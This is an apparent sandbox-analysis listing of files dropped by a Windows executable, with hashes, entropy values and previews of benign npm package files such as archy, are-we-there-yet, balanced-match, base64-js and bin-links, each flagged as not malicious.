              Preview:{. "name" : "archy",. "version" : "1.0.0",. "description" : "render nested hierarchies `npm ls` style with unicode pipes",. "main" : "index.js",. "devDependencies" : {. "tap" : "~0.3.3",. "tape" : "~0.1.1". },. "scripts" : {. "test" : "tap test". },. "testling" : {. "files" : "test/*.js",. "browsers" : {. "iexplore" : [ "6.0", "7.0", "8.0", "9.0" ],. "chrome" : [ "20.0" ],. "firefox" : [ "10.0", "15.0" ],. "safari" : [ "5.1" ],. "opera" : [ "12.0" ]. }. },. "repository" : {. "type" : "git",. "url" : "http://github.com/substack/node-archy.git". },. "keywords" : [. "hierarchy",. "npm ls",. "unicode",. "pretty",. "print". ],. "author" : {. "name" : "James Halliday",. "email" : "mail@substack.net",. "url" : "http://substack.net". },. "license" : "MIT".}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):834
              Entropy (8bit):3.589149499041079
              Encrypted:false
              SSDEEP:
              MD5:FB5CB8BC88953C962BF0495866F99459
              SHA1:1BB3DF7693CF4DBD198BD3FC91E0C6E3DD82083C
              SHA-256:97FDDAED4283CB3A16C780DF8D4D57D537CF526B6B5B32ED6F7F4CEFB0C93E7D
              SHA-512:F3C777BEC8BAB39A665CB8C330388DA3D9307AAE55E450D3D12367D0E792FDC5E0F62DFB2C065790DC452FE6772F355DF48B247B719CC93134E5F2FD254E7B2C
              Malicious:false
              Reputation:unknown
              Preview:var test = require('tape');.var archy = require('../');..test('beep', function (t) {. var s = archy({. label : 'beep',. nodes : [. 'ity',. {. label : 'boop',. nodes : [. {. label : 'o_O',. nodes : [. {. label : 'oh',. nodes : [ 'hello', 'puny' ]. },. 'human'. ]. },. 'party!'. ]. }. ]. });. t.equal(s, [. 'beep',. '... ity',. '... boop',. ' ... o_O',. ' . ... oh',. ' . . ... hello',. ' . . ... puny',. ' . ... human',. ' ... party!',. ''. ].join('\n'));. t.end();.});.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Unicode text, UTF-8 text
              Category:dropped
              Size (bytes):992
              Entropy (8bit):3.6565687990897207
              Encrypted:false
              SSDEEP:
              MD5:D3430460B0302A6D806BB25D2353B6CF
              SHA1:6892FDE2A90917B678E035CAEC80443460A18973
              SHA-256:24115FD973B40370E7CE330B2BE4B4A103460E74BB4301A542551B066FA45832
              SHA-512:0C24542910ADFE2D52074B4C48D00DDD04BF3E2DD13606AD778C6FF373119DB008934ABEC9A4248F48F15A3CFD3DCB80CEBEC7D6088733C7F957CE770AF81114
              Malicious:false
              Reputation:unknown
              Preview:var test = require('tape');.var archy = require('../');..test('multi-line', function (t) {. var s = archy({. label : 'beep\none\ntwo',. nodes : [. 'ity',. {. label : 'boop',. nodes : [. {. label : 'o_O\nwheee',. nodes : [. {. label : 'oh',. nodes : [ 'hello', 'puny\nmeat' ]. },. 'creature'. ]. },. 'party\ntime!'. ]. }. ]. });. t.equal(s, [. 'beep',. '. one',. '. two',. '... ity',. '... boop',. ' ... o_O',. ' . . wheee',. ' . ... oh',. ' . . ... hello',. ' . . ... puny',. ' . . meat',. ' . ... creature',. ' ... party',. ' time!',. ''. ].join('\n'));. t.end();.});.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):799
              Entropy (8bit):3.4432590196994437
              Encrypted:false
              SSDEEP:
              MD5:99692FEE8CC6537E5E1D489D21F217C3
              SHA1:B19A7E7ACE40AF5C5B4C8FF3508C7FDC642E3C2C
              SHA-256:7A058C68DE6C1BDFDFE4B094426EFA66593BA718736CC41AAAF13B57E84313A5
              SHA-512:B4128806C0E9ADA9DBD43C0ABEC685E9678145FA4B1821B5C710D1CD8669C3CF89B8D935832FB2EFF0C23D456DAB7A28F1E7DDBB7975B5CEECB4FCB73F81CDAC
              Malicious:false
              Reputation:unknown
              Preview:var test = require('tape');.var archy = require('../');..test('beep', function (t) {. var s = archy({. label : 'beep',. nodes : [. 'ity',. {. label : 'boop',. nodes : [. {. label : 'o_O',. nodes : [. {. label : 'oh',. nodes : [ 'hello', 'puny' ]. },. 'human'. ]. },. 'party!'. ]. }. ]. }, '', { unicode : false });. t.equal(s, [. 'beep',. '+-- ity',. '`-- boop',. ' +-- o_O',. ' | +-- oh',. ' | | +-- hello',. ' | | `-- puny',. ' | `-- human',. ' `-- party!',. ''. ].join('\n'));. t.end();.});.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):163
              Entropy (8bit):4.360207212169072
              Encrypted:false
              SSDEEP:
              MD5:A9C06E81DA780A0568FA5A53E8D7E4FE
              SHA1:D154805F279E1F7708732426E960AB7990FFFBE2
              SHA-256:7A427679A9B245F02D66BB09AEAA5337BDFF29375D05F3F34E7133B61001BB69
              SHA-512:79C8F738B2397A79F192EA55E6145A4333C3B555C230D32840A06CA9DACCC5B75F547AE56DCC28561F2D6AEA9C033C24CAB385E344D8697234654B6FD909BA2C
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.exports.TrackerGroup = require('./tracker-group.js').exports.Tracker = require('./tracker.js').exports.TrackerStream = require('./tracker-stream.js').
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):230
              Entropy (8bit):4.4593058259276965
              Encrypted:false
              SSDEEP:
              MD5:497EFD321B257EEB8FD01C307EA7A797
              SHA1:E813F4685F7B05AF12FE99F1F8B2310409FB9AF0
              SHA-256:E9EEFB40CAD4B9CE8F2AF828EF13F44B7288E6A4A82CCB6DAE78CCDED64F7EF5
              SHA-512:841745CCD074E692A91013D47F5640E1AB1860472F1512688A369771DC85EA3E99161E55718479736F88260D2240516847D64DB36E5A9C08848DD92838A332C7
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const EventEmitter = require('events')..let trackerId = 0.class TrackerBase extends EventEmitter {. constructor (name) {. super(). this.id = ++trackerId. this.name = name. }.}..module.exports = TrackerBase.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2921
              Entropy (8bit):4.630248457043551
              Encrypted:false
              SSDEEP:
              MD5:3FF062CAB3A966C61CD8463E2D00FC26
              SHA1:69A0C592546FB944452B12926E2360199AB00EE3
              SHA-256:1FAC19E9500F5F9B85AA7321445A6E0029B589BEC21C71EF40301A8078152C27
              SHA-512:182B62D64E114142B0D9413F00CE46F5FD4010739FD789F4698260BC2385909CB3EA2F5B5261FEC9A95D3B97B609EE66B08F5773C9F049C3AB5BDCBAC15265AE
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const TrackerBase = require('./tracker-base.js').const Tracker = require('./tracker.js').const TrackerStream = require('./tracker-stream.js')..class TrackerGroup extends TrackerBase {. parentGroup = null. trackers = []. completion = {}. weight = {}. totalWeight = 0. finished = false. bubbleChange = bubbleChange(this).. nameInTree () {. var names = []. var from = this. while (from) {. names.unshift(from.name). from = from.parentGroup. }. return names.join('/'). }.. addUnit (unit, weight) {. if (unit.addUnit) {. var toTest = this. while (toTest) {. if (unit === toTest) {. throw new Error(. 'Attempted to add tracker group ' +. unit.name + ' to tree that already includes it ' +. this.nameInTree(this)). }. toTest = toTest.parentGroup. }. unit.parentGroup = this. }. this.weight[unit.id] = weight || 1. this.totalWeight += this.weight[unit.id]. this.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):882
              Entropy (8bit):4.6254632228547505
              Encrypted:false
              SSDEEP:
              MD5:BD555B6CF125A0DD91D079C2AA4DBEA6
              SHA1:93D5F4E61BBAFC8469946323C5DEF49E9AFD5170
              SHA-256:A558CC470210F50820FA758D18358B3AADED0E6CA49603F70E401FF02F1E5ECF
              SHA-512:8DD3AEC3C7AB218BE5100544C37031598EA197F38CC3EAF2E4CF2D68B4D2B62E1D3A110F7E465D390979C1F41EBE29324B1CE5281764B9772BF865F4720E6EC0
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const stream = require('readable-stream').const delegate = require('delegates').const Tracker = require('./tracker.js')..class TrackerStream extends stream.Transform {. constructor (name, size, options) {. super(options). this.tracker = new Tracker(name, size). this.name = name. this.id = this.tracker.id. this.tracker.on('change', delegateChange(this)). }.. _transform (data, encoding, cb) {. this.tracker.completeWork(data.length ? data.length : 1). this.push(data). cb(). }.. _flush (cb) {. this.tracker.finish(). cb(). }.}..function delegateChange (trackerStream) {. return function (name, completion, tracker) {. trackerStream.emit('change', name, completion, trackerStream). }.}..delegate(TrackerStream.prototype, 'tracker'). .method('completed'). .method('addWork'). .method('finish')..module.exports = TrackerStream.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):724
              Entropy (8bit):4.589763797599839
              Encrypted:false
              SSDEEP:
              MD5:7D5D68475C41ACA47F2F9639317FC529
              SHA1:AB6ABDAD5AB056B7E94856344746261BBD7AD4E7
              SHA-256:442C5FAD466A76EE5EF4D55CA53729C1EDEC4F303EEB3A10DC960053478F4B13
              SHA-512:13827D96A70144ABB8A6757FD451899FCEA4E8D7EDCE5BEA39207029C5347804EE0ECC7203B9318FDDBF25BDE5C45B8D98EAD6AD692585E445F114BD191F301F
              Malicious:false
              Reputation:unknown
              Preview:'use strict'.const TrackerBase = require('./tracker-base.js')..class Tracker extends TrackerBase {. constructor (name, todo) {. super(name). this.workDone = 0. this.workTodo = todo || 0. }.. completed () {. return this.workTodo === 0 ? 0 : this.workDone / this.workTodo. }.. addWork (work) {. this.workTodo += work. this.emit('change', this.name, this.completed(), this). }.. completeWork (work) {. this.workDone += work. if (this.workDone > this.workTodo) {. this.workDone = this.workTodo. }. this.emit('change', this.name, this.completed(), this). }.. finish () {. this.workTodo = this.workDone = 1. this.emit('change', this.name, 1, this). }.}..module.exports = Tracker.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1406
              Entropy (8bit):4.708859485848862
              Encrypted:false
              SSDEEP:
              MD5:8204181B8632974FCB78B97EE6FE8E15
              SHA1:2BEF4E1F98D3E85477AB0A157504C7DC91F064B7
              SHA-256:14E6E0825B1651B8A4B220C6BEA48E710E7D90229AEB78809DD2CCD71427285C
              SHA-512:B7B8FCE7B4D986AC94A596685C0CF9E35D2F20DA14A726E630EC4983C8E97E3DBFE74D95D3E0EF97435C6F15B29D99A935438EF4818B536E908C7EE4F5FB1B07
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "are-we-there-yet",. "version": "4.0.1",. "description": "Keep track of the overall completion of many disparate processes",. "main": "lib/index.js",. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "lintfix": "npm run lint -- --fix",. "posttest": "npm run lint",. "postsnap": "npm run lintfix --",. "snap": "tap",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force". },. "repository": {. "type": "git",. "url": "https://github.com/npm/are-we-there-yet.git". },. "author": "GitHub Inc.",. "license": "ISC",. "bugs": {. "url": "https://github.com/npm/are-we-there-yet/issues". },. "homepage": "https://github.com/npm/are-we-there-yet",. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.17.0",. "tap": "^16.0.1". },. "dependencies": {. "delegates": "^1.0.0",. "readable-stream": "^4.1.0". },. "files": [. "bin/",. "lib/". ],. "engine
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1096
              Entropy (8bit):5.156886150628813
              Encrypted:false
              SSDEEP:
              MD5:7FA99DDC3424107350CA6E9A24552085
              SHA1:09013C002FBDD686DA2EC13C5A6D014F0A294BA9
              SHA-256:A1BD5DEADB6A06DD74EFA852C1B8B23F63B67F2214FBE9C8BD591DA51DA69268
              SHA-512:389651CC725F7FA28DFB45E5DE84E232212618F4ADC187443956C8725E5684F39DD25BF040F95513D17675ED2DE7188FA110E669B91987AD956A95C224ACC251
              Malicious:false
              Reputation:unknown
              Preview:(MIT)..Copyright (c) 2013 Julian Gruber &lt;julian@juliangruber.com&gt;..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISIN
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1219
              Entropy (8bit):4.413776416826399
              Encrypted:false
              SSDEEP:
              MD5:32722FE5688AA4937B71D77BBD45B026
              SHA1:12161CFAA33BE93568EC9A6FD3D9C357991A6A76
              SHA-256:06E4D0037715251CB3BE2B2DB063662F555B3538D9E30A9C517A54374D941CBC
              SHA-512:3A7F88D7859F65229ED973D2F7694FADF81EB6C904F9FCCA7E270B6FD5F54052AF57789C2BBBF4F57D9EDEF2CD7FFCB011F666F43A0D6E3B776E59C5726A941F
              Malicious:false
              Reputation:unknown
              Preview:'use strict';.module.exports = balanced;.function balanced(a, b, str) {. if (a instanceof RegExp) a = maybeMatch(a, str);. if (b instanceof RegExp) b = maybeMatch(b, str);.. var r = range(a, b, str);.. return r && {. start: r[0],. end: r[1],. pre: str.slice(0, r[0]),. body: str.slice(r[0] + a.length, r[1]),. post: str.slice(r[1] + b.length). };.}..function maybeMatch(reg, str) {. var m = str.match(reg);. return m ? m[0] : null;.}..balanced.range = range;.function range(a, b, str) {. var begs, beg, left, right, result;. var ai = str.indexOf(a);. var bi = str.indexOf(b, ai + 1);. var i = ai;.. if (ai >= 0 && bi > 0) {. if(a===b) {. return [ai, bi];. }. begs = [];. left = str.length;.. while (i >= 0 && !result) {. if (i == ai) {. begs.push(i);. ai = str.indexOf(a, i + 1);. } else if (begs.length == 1) {. result = [ begs.pop(), bi ];. } else {. beg = begs.pop();. if (beg < left) {. lef
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1069
              Entropy (8bit):4.588010362747497
              Encrypted:false
              SSDEEP:
              MD5:FA13802CF9109F23DB7CC107F33CBF0A
              SHA1:EF0A0D2FD68C3396309AB54AB08C5F8D362436EA
              SHA-256:B30C328501DEAD1870B894AD604405B2284B571C1F12664CDC61D92A2E3397C2
              SHA-512:49CE16A0472608D16E092B06028A854E5C80FBDE30006FDBB6088DAE91770EF87965A32F6E87247719FB7981FEC3DEBDC2169B9DF118D67D656A5378620DB9C1
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "balanced-match",. "description": "Match balanced character pairs, like \"{\" and \"}\"",. "version": "1.0.2",. "repository": {. "type": "git",. "url": "git://github.com/juliangruber/balanced-match.git". },. "homepage": "https://github.com/juliangruber/balanced-match",. "main": "index.js",. "scripts": {. "test": "tape test/test.js",. "bench": "matcha test/bench.js". },. "devDependencies": {. "matcha": "^0.7.0",. "tape": "^4.6.0". },. "keywords": [. "match",. "regexp",. "test",. "balanced",. "parse". ],. "author": {. "name": "Julian Gruber",. "email": "mail@juliangruber.com",. "url": "http://juliangruber.com". },. "license": "MIT",. "testling": {. "files": "test/*.js",. "browsers": [. "ie/8..latest",. "firefox/20..latest",. "firefox/nightly",. "chrome/25..latest",. "chrome/canary",. "opera/12..latest",. "opera/next",. "safari/5.1..latest",. "ipad/6.0..latest",. "
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1081
              Entropy (8bit):5.10215343665425
              Encrypted:false
              SSDEEP:
              MD5:EA9187CA93CDC4F71219D1675712E908
              SHA1:1937AA4955805181CE8585B66F3AD53974B1B1DE
              SHA-256:5B37224C080CDCC97C871ADA971C224E9926370FE74F11B539AA1CF9F3B1ACA1
              SHA-512:6AB4B63E296A721DB1CF973719805AD796A4B774F42DE9E2927E7120F5334FDDFACA60F408991D2051CB45D552256CE481611315D9F3A5BA0A1023CDF728525B
              Malicious:false
              Reputation:unknown
              Preview:The MIT License (MIT)..Copyright (c) 2014 Jameson Little..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (2192), with no line terminators
              Category:dropped
              Size (bytes):2192
              Entropy (8bit):5.61947388063193
              Encrypted:false
              SSDEEP:
              MD5:C21C099915E3FA53E245C717DB6B9074
              SHA1:B2339D6B6ECEC22F74F9954FD6BB7FF4CAF17B59
              SHA-256:D2E82495607ABF54F16E21DE04D90BA9CE1605451667D88425BABECE988F148B
              SHA-512:94B702F475B5397E2705F97DCF7EE43F9C258818064145AA13D56EDB471E23CFD2668763E4EF2CE1023CD5490FC6A380B061E5513EACC5865B42C349320898FD
              Malicious:false
              Reputation:unknown
              Preview:(function(a){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=a();else if("function"==typeof define&&define.amd)define([],a);else{var b;b="undefined"==typeof window?"undefined"==typeof global?"undefined"==typeof self?this:self:global:window,b.base64js=a()}})(function(){return function(){function b(d,e,g){function a(j,i){if(!e[j]){if(!d[j]){var f="function"==typeof require&&require;if(!i&&f)return f(j,!0);if(h)return h(j,!0);var c=new Error("Cannot find module '"+j+"'");throw c.code="MODULE_NOT_FOUND",c}var k=e[j]={exports:{}};d[j][0].call(k.exports,function(b){var c=d[j][1][b];return a(c||b)},k,k.exports,b,d,e,g)}return e[j].exports}for(var h="function"==typeof require&&require,c=0;c<g.length;c++)a(g[c]);return a}return b}()({"/":[function(a,b,c){'use strict';function d(a){var b=a.length;if(0<b%4)throw new Error("Invalid string. Length must be a multiple of 4");var c=a.indexOf("=");-1===c&&(c=b);var d=c===b?0:4-c%4;return[c,d]}function e(a,b,c){return 3*(b+c)/4-c}
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3932
              Entropy (8bit):5.062744025413713
              Encrypted:false
              SSDEEP:
              MD5:C810ECB48B8153C6C413D74614C51BE9
              SHA1:8DE581E64D323F2130CBFB1A154D62ACF894FF5E
              SHA-256:829EADD8A1A441D25BE0CB93B00E16A0D0C20FD294DB95D8F2ED87E6954B7182
              SHA-512:72D541BC83760BA2CC9E35436588ACCA2DE8CD24DD5F3F84952059553886F47C569CC2018E4C1D87337E895A6FEE2DBCD07B7196941AAC6D989C93946DBAB23D
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..exports.byteLength = byteLength.exports.toByteArray = toByteArray.exports.fromByteArray = fromByteArray..var lookup = [].var revLookup = [].var Arr = typeof Uint8Array !== 'undefined' ? Uint8Array : Array..var code = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'.for (var i = 0, len = code.length; i < len; ++i) {. lookup[i] = code[i]. revLookup[code.charCodeAt(i)] = i.}..// Support decoding URL-safe base64 strings, as Node.js does..// See: https://en.wikipedia.org/wiki/Base64#URL_applications.revLookup['-'.charCodeAt(0)] = 62.revLookup['_'.charCodeAt(0)] = 63..function getLens (b64) {. var len = b64.length.. if (len % 4 > 0) {. throw new Error('Invalid string. Length must be a multiple of 4'). }.. // Trim off extra bytes after placeholder bytes are found. // See: https://github.com/beatgammit/base64-js/issues/42. var validLen = b64.indexOf('='). if (validLen === -1) validLen = len.. var placeHoldersLen = validLen === len. ? 0. : 4 -
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1115
              Entropy (8bit):4.6834374753976915
              Encrypted:false
              SSDEEP:
              MD5:8C3C32AD06DB4E10D96A32653DE4F1C3
              SHA1:E17D74F1F7F0FA4BCA8BA3A2CFF79B34F64718EA
              SHA-256:9758F3AB8C45E07BB9A368E32F9A8B3729623BBF47CBBB205B32D674AB2A91F0
              SHA-512:6E0881F76B2BC97CDA94D4C4401A3B28309EA2859EC302D51D20216F141A334A52D4B794F0C292A479E7A543557C481B137F2FBAF7C2957106037779FD63C28B
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "base64-js",. "description": "Base64 encoding/decoding in pure JS",. "version": "1.5.1",. "author": "T. Jameson Little <t.jameson.little@gmail.com>",. "typings": "index.d.ts",. "bugs": {. "url": "https://github.com/beatgammit/base64-js/issues". },. "devDependencies": {. "babel-minify": "^0.5.1",. "benchmark": "^2.1.4",. "browserify": "^16.3.0",. "standard": "*",. "tape": "4.x". },. "homepage": "https://github.com/beatgammit/base64-js",. "keywords": [. "base64". ],. "license": "MIT",. "main": "index.js",. "repository": {. "type": "git",. "url": "git://github.com/beatgammit/base64-js.git". },. "scripts": {. "build": "browserify -s base64js -r ./ | minify > base64js.min.js",. "lint": "standard",. "test": "npm run lint && npm run unit",. "unit": "tape test/*.js". },. "funding": [. {. "type": "github",. "url": "https://github.com/sponsors/feross". },. {. "type": "patreon",. "url": "https://www.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):329
              Entropy (8bit):4.882696030126405
              Encrypted:false
              SSDEEP:
              MD5:5C8BDDD6ACAA3FFA3D1E9B505F88BC48
              SHA1:AFA32581385AC69890499078EA658660A6C8CAB3
              SHA-256:9D3611A931B18C135619FA7B4722B7C8248CCFAC72CA1D42098047DA2BD4FA9E
              SHA-512:5A8FF1B0C0A91B46CD93DB8CA0410D5EB62E5B2BA0353E6E892EBDF5ED561893B1722D74E86CDB83DD577B62DB4CFB77980348354AE72282BDBF7FF9D9904891
              Malicious:false
              Reputation:unknown
              Preview:const isWindows = require('./is-windows.js').const getPrefix = require('./get-prefix.js').const getNodeModules = require('./get-node-modules.js').const { dirname } = require('path')..module.exports = ({ top, path }) =>. !top ? getNodeModules(path) + '/.bin'. : isWindows ? getPrefix(path). : dirname(getPrefix(path)) + '/bin'.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2064
              Entropy (8bit):4.854852371370503
              Encrypted:false
              SSDEEP:
              MD5:9EF0FC8E4A4373E3F4DEE2F6DD3ECE4D
              SHA1:40BD389ADD4B62DFABA2AE6592EE365D61AE8DF5
              SHA-256:D3BED799627906E9504DEDC82BB0296519DC4A1D73666DDC8BBDCE73251F54D6
              SHA-512:71FFA8B4FDF1C10665F1C17BC0AECA5A066AF2CD04243A7858747B2200EEEC338933949B8E87C4398D0D5468EF375ACC366BA0B96A1D84027F0C11FAC88C4D97
              Malicious:false
              Reputation:unknown
              Preview:// check to see if a bin is allowed to be overwritten.// either rejects or resolves to nothing. return value not relevant..const isWindows = require('./is-windows.js').const binTarget = require('./bin-target.js').const { resolve, dirname } = require('path').const readCmdShim = require('read-cmd-shim').const { readlink } = require('fs/promises')..const checkBin = async ({ bin, path, top, global, force }) => {. // always ok to clobber when forced. // always ok to clobber local bins, or when forced. if (force || !global || !top) {. return. }.. // ok, need to make sure, then. const target = resolve(binTarget({ path, top }), bin). path = resolve(path). return isWindows ? checkShim({ target, path }) : checkLink({ target, path }).}..// only enoent is allowed. anything else is a problem..const handleReadLinkError = async ({ er, target }) =>. er.code === 'ENOENT' ? null. : failEEXIST({ target })..const checkLink = async ({ target, path }) => {. const current = await readlink(tar
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):493
              Entropy (8bit):4.784524986504357
              Encrypted:false
              SSDEEP:
              MD5:E6140E083DC490BBD90927BA5D6E6195
              SHA1:36EFB969A86F454F953D36235141B2F6D7C375DD
              SHA-256:8C48F07F5C530F0D033A4B34BE9933C8376BE6C9383F8A6A87D234B11FB4B658
              SHA-512:89BA4C52BB4F99AA845B9E70CAC168DCC1D18A244B7C49D74C5E4C0A970909641D2799E81081EF1BB6CAFBF40EAD5913439B72C4FEA5DE66A58DC3C54321B2C0
              Malicious:false
              Reputation:unknown
              Preview:const checkBin = require('./check-bin.js').const normalize = require('npm-normalize-package-bin').const checkBins = async ({ pkg, path, top, global, force }) => {. // always ok to clobber when forced. // always ok to clobber local bins, or when forced. if (force || !global || !top) {. return. }.. pkg = normalize(pkg). if (!pkg.bin) {. return. }.. await Promise.all(Object.keys(pkg.bin). .map(bin => checkBin({ bin, path, top, global, force }))).}.module.exports = checkBins.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1160
              Entropy (8bit):4.995402991883019
              Encrypted:false
              SSDEEP:
              MD5:70FED99CA7F2A1C52011AACF7B93E1AE
              SHA1:B1A183F53662D63A95530AF37C5D17EC2C651481
              SHA-256:EED383D9CB6529244F5F5C29EE8258D141F3231B06DB4A453D1181DAC3F83F1B
              SHA-512:6E44689818F852C448F37280483B329FB2C247486570D802B466AB07AD45DC73F825447F1B2D7F04763DF55CEAADD99ED00B6E5DEC83C88D27B5A7A00C277F51
              Malicious:false
              Reputation:unknown
              Preview:// make sure that bins are executable, and that they don't have.// windows line-endings on the hashbang line..const {. chmod,. open,. readFile,.} = require('fs/promises')..const execMode = 0o777 & (~process.umask())..const writeFileAtomic = require('write-file-atomic')..const isWindowsHashBang = buf =>. buf[0] === '#'.charCodeAt(0) &&. buf[1] === '!'.charCodeAt(0) &&. /^#![^\n]+\r\n/.test(buf.toString())..const isWindowsHashbangFile = file => {. const FALSE = () => false. return open(file, 'r').then(fh => {. const buf = Buffer.alloc(2048). return fh.read(buf, 0, 2048, 0). .then(. () => {. const isWHB = isWindowsHashBang(buf). return fh.close().then(() => isWHB, () => isWHB). },. // don't leak FD if read() fails. () => fh.close().then(FALSE, FALSE). ). }, FALSE).}..const dos2Unix = file =>. readFile(file, 'utf8').then(content =>. writeFileAtomic(file, content.replace(/^(#![^\n]+)\r\n/, '$1\n')))..const fixBin = (
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):534
              Entropy (8bit):4.610047431284625
              Encrypted:false
              SSDEEP:
              MD5:42521F7D9DE09ADD32F9BF4C8565DB80
              SHA1:3F78AED4FBA981634DFE34A0D0204EC0CCAB45BF
              SHA-256:13C88721D65427EDE8FBE56DA7F4F65A10A1E2E18004FABF6A6E567649544DF4
              SHA-512:76B64ED001F943C39FDBC083F62D734165054EC09A84C9176B4D4CA6902B94BB563CB1D2CDAFB7A9B436C2B3CA01D5709951F2FBD19329FBB069B265AF23A349
              Malicious:false
              Reputation:unknown
              Preview:// we know it's global and/or not top, so the path has to be.// {prefix}/node_modules/{name}. Can't rely on pkg.name, because.// it might be installed as an alias...const { dirname, basename } = require('path').// this gets called a lot and can't change, so memoize it.const memo = new Map().module.exports = path => {. if (memo.has(path)) {. return memo.get(path). }.. const scopeOrNm = dirname(path). const nm = basename(scopeOrNm) === 'node_modules' ? scopeOrNm. : dirname(scopeOrNm).. memo.set(path, nm). return nm.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1245
              Entropy (8bit):4.712505804905162
              Encrypted:false
              SSDEEP:
              MD5:EBE8AE81FB37CE3B9013E079A98E93CF
              SHA1:485D49B124B7E90FA5A095CD9121D6793DA0D684
              SHA-256:879F022D46E9ABB72F5433D2C640D930A48C73D63DC116E3C211B5A6EEC4B3EE
              SHA-512:751CF6C020E47E200A3FE77247791DB7405779B4864F62E30E722BA42F6DCD51EE7B08395A17DA8327EC1C884D63B1D5CE04A60951605334EB7E2EDB04F147CD
              Malicious:false
              Reputation:unknown
              Preview:// get all the paths that are (or might be) installed for a given pkg.// There's no guarantee that all of these will be installed, but if they.// are present, then we can assume that they're associated..const binTarget = require('./bin-target.js').const manTarget = require('./man-target.js').const { resolve, basename, extname } = require('path').const isWindows = require('./is-windows.js').module.exports = ({ path, pkg, global, top }) => {. if (top && !global) {. return []. }.. const binSet = []. const binTarg = binTarget({ path, top }). if (pkg.bin) {. for (const bin of Object.keys(pkg.bin)) {. const b = resolve(binTarg, bin). binSet.push(b). if (isWindows) {. binSet.push(b + '.cmd'). binSet.push(b + '.ps1'). }. }. }.. const manTarg = manTarget({ path, top }). const manSet = []. if (manTarg && pkg.man && Array.isArray(pkg.man) && pkg.man.length) {. for (const man of pkg.man) {. if (!/.\.[0-9]+(\.gz)?$/.test(man)) {. re
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):147
